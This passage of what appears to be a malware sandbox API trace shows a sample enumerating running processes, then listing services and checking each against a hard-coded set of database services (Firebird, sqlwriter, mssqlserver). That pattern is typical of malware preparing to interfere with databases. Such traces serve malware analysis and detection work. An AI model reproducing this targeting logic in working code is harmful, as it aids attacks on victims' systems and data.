lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.766] lstrlenW (lpString="svchost.exe") returned 11 [0157.766] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.766] lstrlenW (lpString="svchost.exe") returned 11 [0157.766] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.767] lstrlenW (lpString="svchost.exe") returned 11 [0157.767] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.768] lstrlenW (lpString="svchost.exe") returned 11 [0157.768] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0157.769] lstrlenW (lpString="spoolsv.exe") returned 11 [0157.769] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.770] lstrlenW (lpString="svchost.exe") returned 11 [0157.770] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0157.771] lstrlenW (lpString="audiodg.exe") returned 11 [0157.771] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0157.772] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0157.772] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0157.773] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0157.773] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0157.774] lstrlenW (lpString="Memory Compression") returned 18 [0157.774] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0157.774] lstrlenW (lpString="sihost.exe") returned 10 [0157.774] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.775] lstrlenW (lpString="svchost.exe") returned 11 [0157.775] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0157.776] lstrlenW (lpString="msoia.exe") returned 9 [0157.776] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0157.777] lstrlenW (lpString="taskhostw.exe") returned 13 [0157.777] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0157.778] lstrlenW (lpString="explorer.exe") returned 12 [0157.778] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0157.779] lstrlenW (lpString="SearchUI.exe") returned 12 [0157.779] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0157.780] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0157.780] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0157.780] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0157.780] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.781] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0157.781] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0157.782] lstrlenW (lpString="hgaibc.exe") returned 10 [0157.782] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0157.783] lstrlenW (lpString="cmd.exe") returned 7 [0157.783] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0157.784] lstrlenW (lpString="conhost.exe") returned 11 [0157.784] Process32NextW (in: hSnapshot=0x414, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0157.785] CloseHandle (hObject=0x414) returned 1 [0157.785] Sleep (dwMilliseconds=0x1f4) [0158.384] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c290 [0158.385] EnumServicesStatusExW (in: hSCManager=0x458c290, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0158.385] GetLastError () returned 0xea [0158.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x4595fc8 [0158.386] EnumServicesStatusExW (in: hSCManager=0x458c290, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4595fc8, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4595fc8, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0158.387] CloseServiceHandle (hSCObject=0x458c290) returned 1 [0158.387] lstrlenW (lpString="AppXSvc") returned 7 [0158.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0158.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0158.387] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0158.387] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0158.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0158.387] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0158.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0158.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0158.387] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0158.387] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0158.387] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0158.387] lstrlenW (lpString="Audiosrv") returned 8 [0158.387] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0158.387] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0158.387] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0158.388] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0158.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0158.388] lstrlenW (lpString="BFE") returned 3 [0158.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0158.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0158.388] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0158.388] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0158.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0158.388] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0158.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0158.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0158.388] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0158.388] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0158.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0158.388] lstrlenW (lpString="CDPSvc") returned 6 [0158.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0158.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0158.388] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0158.388] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0158.388] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0158.388] lstrlenW (lpString="ClickToRunSvc") returned 13 [0158.388] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0158.388] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0158.389] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0158.389] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0158.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0158.389] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0158.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0158.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0158.389] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0158.389] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0158.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0158.389] lstrlenW (lpString="CryptSvc") returned 8 [0158.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0158.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0158.389] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0158.389] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0158.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0158.389] lstrlenW (lpString="DcomLaunch") returned 10 [0158.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0158.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0158.389] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0158.389] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0158.389] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0158.389] lstrlenW (lpString="DeviceAssociationService") returned 24 [0158.389] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0158.389] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0158.390] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0158.390] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0158.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0158.390] lstrlenW (lpString="Dhcp") returned 4 [0158.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0158.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0158.390] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0158.390] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0158.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0158.390] lstrlenW (lpString="Dnscache") returned 8 [0158.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0158.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0158.390] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0158.390] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0158.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0158.390] lstrlenW (lpString="DPS") returned 3 [0158.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0158.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0158.390] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0158.390] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0158.390] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0158.390] lstrlenW (lpString="DusmSvc") returned 7 [0158.390] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0158.390] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0158.390] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0158.391] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0158.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0158.391] lstrlenW (lpString="EventLog") returned 8 [0158.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0158.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0158.391] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0158.391] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0158.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0158.391] lstrlenW (lpString="EventSystem") returned 11 [0158.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0158.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0158.391] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0158.391] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0158.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0158.391] lstrlenW (lpString="FontCache") returned 9 [0158.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0158.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0158.391] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0158.391] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0158.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0158.391] lstrlenW (lpString="gpsvc") returned 5 [0158.391] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0158.391] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0158.391] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0158.391] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0158.391] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0158.392] lstrlenW (lpString="iphlpsvc") returned 8 [0158.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0158.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0158.392] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0158.392] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0158.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0158.392] lstrlenW (lpString="KeyIso") returned 6 [0158.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0158.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0158.392] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0158.392] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0158.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0158.392] lstrlenW (lpString="LanmanServer") returned 12 [0158.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0158.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0158.392] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0158.392] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0158.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0158.392] lstrlenW (lpString="LanmanWorkstation") returned 17 [0158.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0158.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0158.392] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0158.392] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0158.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0158.392] lstrlenW (lpString="lfsvc") returned 5 [0158.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0158.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0158.393] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0158.393] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0158.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0158.393] lstrlenW (lpString="lmhosts") returned 7 [0158.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0158.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0158.393] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0158.393] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0158.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0158.393] lstrlenW (lpString="LSM") returned 3 [0158.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0158.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0158.393] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0158.393] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0158.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0158.393] lstrlenW (lpString="MpsSvc") returned 6 [0158.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0158.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0158.393] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0158.393] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0158.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0158.393] lstrlenW (lpString="NcbService") returned 10 [0158.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0158.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0158.393] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0158.393] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0158.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0158.394] lstrlenW (lpString="netprofm") returned 8 [0158.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0158.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0158.394] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0158.394] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0158.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0158.394] lstrlenW (lpString="NgcSvc") returned 6 [0158.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0158.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0158.394] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0158.394] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0158.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0158.394] lstrlenW (lpString="NlaSvc") returned 6 [0158.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0158.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0158.394] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0158.394] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0158.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0158.394] lstrlenW (lpString="nsi") returned 3 [0158.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0158.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0158.394] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0158.394] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0158.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0158.394] lstrlenW (lpString="PcaSvc") returned 6 [0158.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0158.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0158.395] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0158.395] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0158.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0158.395] lstrlenW (lpString="PlugPlay") returned 8 [0158.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0158.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0158.395] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0158.395] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0158.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0158.395] lstrlenW (lpString="Power") returned 5 [0158.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0158.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0158.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0158.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0158.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0158.395] lstrlenW (lpString="ProfSvc") returned 7 [0158.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0158.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 